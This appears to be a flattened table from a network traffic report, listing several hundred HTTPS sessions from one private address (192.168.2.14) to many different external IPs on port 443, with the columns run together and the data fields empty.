                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24527192.168.2.14424825.161.27.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24528192.168.2.1439750181.140.41.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24529192.168.2.1458758152.68.57.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24530192.168.2.1449198175.56.11.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24531192.168.2.1446388192.147.177.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24532192.168.2.145065035.153.3.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24533192.168.2.1456580106.33.5.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24534192.168.2.146094472.244.64.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24535192.168.2.1448038220.61.221.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24536192.168.2.1455794143.161.143.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24537192.168.2.1453912206.203.116.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24538192.168.2.1455662155.171.0.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24539192.168.2.1455562176.226.28.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24540192.168.2.1459192102.236.41.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24541192.168.2.1435842165.62.248.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24542192.168.2.1436354136.148.199.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24543192.168.2.1443042130.232.168.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24544192.168.2.143277083.112.108.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24545192.168.2.1451354139.95.12.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24546192.168.2.1459950147.121.241.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24547192.168.2.145898835.38.176.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24548192.168.2.1459536149.13.66.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24549192.168.2.14563245.218.100.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24550192.168.2.1440248150.38.17.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24551192.168.2.145437496.58.113.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24552192.168.2.145254299.199.28.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24553192.168.2.1450334138.199.185.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24554192.168.2.1449746148.25.100.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24555192.168.2.1448168122.224.171.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24556192.168.2.143349044.50.57.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24557192.168.2.145826059.236.182.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24558192.168.2.1458752103.245.238.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24559192.168.2.1437798166.220.111.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24560192.168.2.1440398221.72.244.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24561192.168.2.1436886135.97.247.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24562192.168.2.145072699.181.159.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24563192.168.2.1450536205.137.131.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24564192.168.2.1446406155.201.118.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24565192.168.2.145311638.29.40.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24566192.168.2.145972038.217.251.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24567192.168.2.1460334112.120.233.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24568192.168.2.14451262.120.5.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24569192.168.2.145871431.148.216.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24570192.168.2.1434080148.132.196.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24571192.168.2.1440298143.131.88.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24572192.168.2.1460124163.166.133.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24573192.168.2.1452640205.9.225.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24574192.168.2.1436842171.1.135.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24575192.168.2.145630646.248.5.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24576192.168.2.1432852121.24.85.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24577192.168.2.1447866109.65.50.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24578192.168.2.144830413.7.124.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24579192.168.2.1449212187.108.74.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24580192.168.2.144672277.209.108.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24581192.168.2.1440900108.201.186.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24582192.168.2.144586272.42.189.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24583192.168.2.144487476.75.137.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24584192.168.2.1448838156.196.37.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24585192.168.2.144463699.148.63.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24586192.168.2.1455616115.208.9.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24587192.168.2.1455588147.249.54.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24588192.168.2.1443976223.23.18.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24589192.168.2.145597212.120.236.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24590192.168.2.1441136118.244.172.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24591192.168.2.1435014195.247.66.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24592192.168.2.145815848.21.62.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24593192.168.2.144217837.159.123.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24594192.168.2.1452040167.152.245.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24595192.168.2.1443098197.29.142.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24596192.168.2.1457132170.167.135.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24597192.168.2.144283252.70.250.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24598192.168.2.1451108182.181.224.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24599192.168.2.1451408131.51.191.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24600192.168.2.144970460.246.215.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24601192.168.2.145987027.45.188.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24602192.168.2.145641069.91.82.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24603192.168.2.1438472100.247.241.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24604192.168.2.145352258.26.102.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24605192.168.2.1441100129.5.148.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24606192.168.2.14551462.7.211.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24607192.168.2.1445772189.75.249.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24608192.168.2.1457732130.236.252.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24609192.168.2.144311699.98.19.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24610192.168.2.144540479.120.159.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24611192.168.2.145281658.63.72.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24612192.168.2.144218858.23.154.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24613192.168.2.1454004106.14.178.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24614192.168.2.144507866.251.103.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24615192.168.2.143911838.134.216.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24616192.168.2.144336688.22.177.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24617192.168.2.1459990134.53.98.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24618192.168.2.145807012.199.200.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24619192.168.2.1436574205.133.44.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24620192.168.2.144582234.225.172.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24621192.168.2.145809444.193.20.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24622192.168.2.1459530164.234.55.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24623192.168.2.1451288147.115.180.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24624192.168.2.145879439.133.166.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24625192.168.2.1448722161.149.190.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24626192.168.2.1443592106.58.40.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24627192.168.2.145375876.194.243.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24628192.168.2.1450828178.214.219.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24629192.168.2.1457770103.84.187.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24630192.168.2.1445936181.167.117.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24631192.168.2.1440532150.99.182.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24632192.168.2.143635065.238.120.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24633192.168.2.1453268198.110.200.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24634192.168.2.1460108179.251.73.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24635192.168.2.1440512116.172.206.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24636192.168.2.143509046.155.89.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24637192.168.2.145688088.111.2.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24638192.168.2.1438746184.173.253.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24639192.168.2.143830277.254.221.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24640192.168.2.145560482.72.83.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24641192.168.2.1457404186.214.85.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24642192.168.2.145450674.147.252.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24643192.168.2.145026617.17.93.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24644192.168.2.143459080.89.39.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24645192.168.2.1442396221.117.36.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24646192.168.2.145693089.18.161.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24647192.168.2.1442966188.203.105.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24648192.168.2.143298452.216.130.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24649192.168.2.145652481.97.207.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24650192.168.2.1456370134.236.133.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24651192.168.2.1434198165.73.174.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24652192.168.2.1453060202.254.218.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24653192.168.2.1443688146.188.11.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24654192.168.2.144241846.90.16.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24655192.168.2.144039227.232.40.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24656192.168.2.1442952218.49.165.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24657192.168.2.1460948149.35.172.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24658192.168.2.1451676113.108.95.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24659192.168.2.143301090.149.143.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24660192.168.2.14517905.27.137.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24661192.168.2.144346646.56.95.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24662192.168.2.146095298.76.248.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24663192.168.2.1449502118.215.122.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24664192.168.2.1446412197.5.240.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24665192.168.2.1447216168.75.170.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24666192.168.2.1444442192.166.249.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24667192.168.2.145857892.244.170.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24668192.168.2.1452426161.0.212.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24669192.168.2.1458114125.208.123.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24670192.168.2.1447242139.14.28.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24671192.168.2.1446910116.244.209.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24672192.168.2.145065490.144.103.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24673192.168.2.144073289.103.7.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24674192.168.2.145337059.15.159.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24675192.168.2.1451726107.62.58.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24676192.168.2.144574634.14.183.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24677192.168.2.1448338175.4.151.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24678192.168.2.143961447.191.15.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24679192.168.2.144688612.164.208.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24680192.168.2.1455750170.89.66.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24681192.168.2.1435404159.119.242.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24682192.168.2.1457094191.106.83.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24683192.168.2.143974673.114.68.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24684192.168.2.144579225.143.65.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24685192.168.2.1432924126.66.216.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24686192.168.2.1457114192.39.19.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24687192.168.2.145778459.76.120.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24688192.168.2.144288012.212.95.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24689192.168.2.143681294.217.139.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24690192.168.2.1441882201.51.105.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24691192.168.2.145983236.21.92.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24692192.168.2.143938045.134.224.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24693192.168.2.1442598123.174.12.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24694192.168.2.1460164118.156.144.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24695192.168.2.1460054139.197.218.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24696192.168.2.1440884149.223.228.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24697192.168.2.1444572183.62.145.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24698192.168.2.145067679.253.16.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24699192.168.2.145802277.24.226.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24700192.168.2.14447802.92.67.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24701192.168.2.1432778118.88.142.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24702192.168.2.1437092199.116.69.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24703192.168.2.144500877.201.205.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24704192.168.2.1438412170.202.193.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24705192.168.2.1450318219.111.92.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24706192.168.2.1451550220.217.214.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24707192.168.2.1442722219.30.157.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24708192.168.2.145182696.142.126.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24709192.168.2.143818073.71.224.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24710192.168.2.145757813.120.174.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24711192.168.2.1449066183.220.133.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24712192.168.2.144998039.152.227.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24713192.168.2.1444888165.129.162.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24714192.168.2.1453492190.137.210.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24715192.168.2.1456450147.173.184.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24716192.168.2.144778858.53.166.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24717192.168.2.14414741.35.225.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24718192.168.2.1434484106.129.107.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24719192.168.2.1459692173.179.221.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24720192.168.2.14566669.199.0.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24721192.168.2.1453120223.109.247.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24722192.168.2.1453788149.210.236.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24723192.168.2.143478875.116.162.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24724192.168.2.145823457.47.183.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24725192.168.2.1454136181.147.204.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24726192.168.2.1442544179.57.112.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24727192.168.2.1456730157.162.68.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24728192.168.2.1432908204.150.160.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24729192.168.2.1448490196.10.88.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24730192.168.2.1459658156.132.39.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24731192.168.2.1433482173.18.131.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24732192.168.2.144493425.100.227.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24733192.168.2.143331631.206.120.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24734192.168.2.1460034201.84.159.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24735192.168.2.1451036130.127.47.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24736192.168.2.144143498.6.223.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24737192.168.2.144424657.134.223.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24738192.168.2.1440866145.207.68.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24739192.168.2.1458472140.6.242.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24740192.168.2.145338297.162.11.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24741192.168.2.1449986180.255.176.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24742192.168.2.145435498.53.26.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24743192.168.2.143925644.19.135.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24744192.168.2.145135072.125.204.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24745192.168.2.1450080173.45.196.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24746192.168.2.1447796216.124.8.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24747192.168.2.143597259.38.22.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24748192.168.2.144787280.36.249.166443
